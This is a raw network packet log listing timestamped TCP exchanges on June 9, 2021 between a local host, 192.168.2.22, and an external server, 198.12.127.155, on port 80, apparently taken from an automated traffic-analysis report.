Jun 9, 2021 08:04:57.342325926 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.342329979 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.342348099 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.342360020 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.342369080 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.342372894 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.342390060 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.342397928 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.342412949 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.342423916 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.342437983 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.342458010 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.342461109 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.342468023 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.342482090 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.342494965 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.342504025 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.342509985 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.342530966 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.344120979 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.478873968 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.478913069 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.478935957 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.478964090 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.478986979 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479012966 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479038000 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479057074 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479062080 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479080915 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479083061 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479088068 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479091883 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479125023 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479127884 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479151964 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479159117 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479176044 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479182959 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479203939 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479227066 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479228973 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479238987 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479252100 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479254961 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479275942 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479288101 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479301929 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479302883 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479329109 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479336023 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479352951 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479363918 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479377985 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479379892 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479404926 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479413033 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479429007 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479443073 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479454041 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479456902 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479477882 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479486942 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479502916 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479512930 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479526043 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479526043 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479549885 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479557991 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479574919 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479583025 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479603052 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479604959 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479629993 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479636908 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479652882 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479665041 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479677916 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479696989 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479701996 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479720116 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479727983 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479738951 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479753017 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479753971 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479779005 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.479783058 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.479813099 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.480211020 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.480237007 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.480257034 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.480262041 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.480272055 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.480287075 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.480298042 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.480314016 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.481375933 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.616102934 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.616139889 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.616163969 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.616187096 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.616211891 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.616236925 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.616261005 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.616281986 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.616287947 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.616309881 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.616312027 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.616313934 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.616317034 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.616336107 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.616336107 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.616360903 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.616369009 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.616386890 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.616404057 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.616410971 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.616417885 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.616434097 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.616441965 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.616461039 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.616468906 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.616485119 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.616503000 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.616513968 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.617542028 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.617578030 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.617609024 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.617609024 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.617626905 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.617635012 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.617641926 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.617659092 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.617665052 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.617685080 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.617695093 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.617711067 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.617716074 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.617739916 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.617743015 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.617767096 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.617774010 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.617790937 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.617798090 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.617815971 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.617820024 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.617841005 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.617847919 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.617863894 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.617870092 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.617887020 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.617893934 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.617913008 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.617919922 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.617939949 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.617943048 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.617964029 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.617970943 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.617988110 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.617995024 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.618012905 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.618017912 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.618036032 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.618042946 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.618060112 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.618067026 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.618084908 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.618088961 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.618107080 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.618113995 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.618134975 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.618136883 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.618160009 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.618165016 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.618182898 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.618190050 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.618207932 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.618212938 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.618233919 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.618240118 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.618257046 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.618264914 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.618283033 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.618288994 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.618307114 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.618311882 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.618335009 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.618338108 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.618366003 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.618942976 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.755213976 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.755254984 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.755279064 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.755285978 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.755301952 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.755310059 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.755311966 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.755322933 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.755333900 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.755343914 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.755348921 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.755367994 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.755377054 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.755392075 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.755398989 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.755422115 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.757926941 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.757963896 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.757987022 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758011103 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758017063 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758038044 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758043051 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758045912 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758068085 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758074045 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758099079 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758107901 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758125067 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758128881 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758150101 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758153915 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758173943 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758179903 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758199930 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758203983 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758224010 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758228064 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758249044 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758275986 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758297920 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758301973 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758305073 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758321047 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758326054 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758336067 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758349895 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758352041 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758372068 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758379936 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758395910 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758399963 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758419037 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758425951 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758441925 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758449078 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758469105 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758471012 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758493900 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758498907 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758517981 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758524895 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758543015 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758548021 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758567095 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758572102 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758590937 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758599043 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758615971 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758620024 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758642912 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758645058 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758671045 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758671999 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758697033 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758699894 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758722067 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758724928 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758745909 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758753061 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758769035 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758774996 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758793116 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758800030 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758816004 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758821011 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758838892 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758846045 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758866072 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758867979 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758891106 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758894920 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758913040 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.758919954 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.758941889 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.759967089 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.762037992 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.891654015 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.891694069 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.891717911 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.891742945 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.891767979 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.891788960 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.891812086 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.891835928 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.891851902 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.891877890 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.891880989 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.891882896 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.895535946 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.895579100 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.895603895 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.895629883 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.895653963 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.895677090 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.895677090 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.895697117 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.895699024 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.895700932 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.895704031 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.895723104 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.895730972 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.895745039 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.895745039 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.895770073 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.895771980 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.895792007 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.895798922 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.895823002 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.895936012 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.895960093 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.895972013 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.895987034 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.895987034 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.896023035 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.896071911 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.898183107 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.898222923 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.898252010 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.898274899 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.898287058 CEST	49167	80	192.168.2.22	198.12.127.155
Jun 9, 2021 08:04:57.898302078 CEST	80	49167	198.12.127.155	192.168.2.22
Jun 9, 2021 08:04:57.898308039 CEST	49167	80	192.168.2.22	198.12.127.155
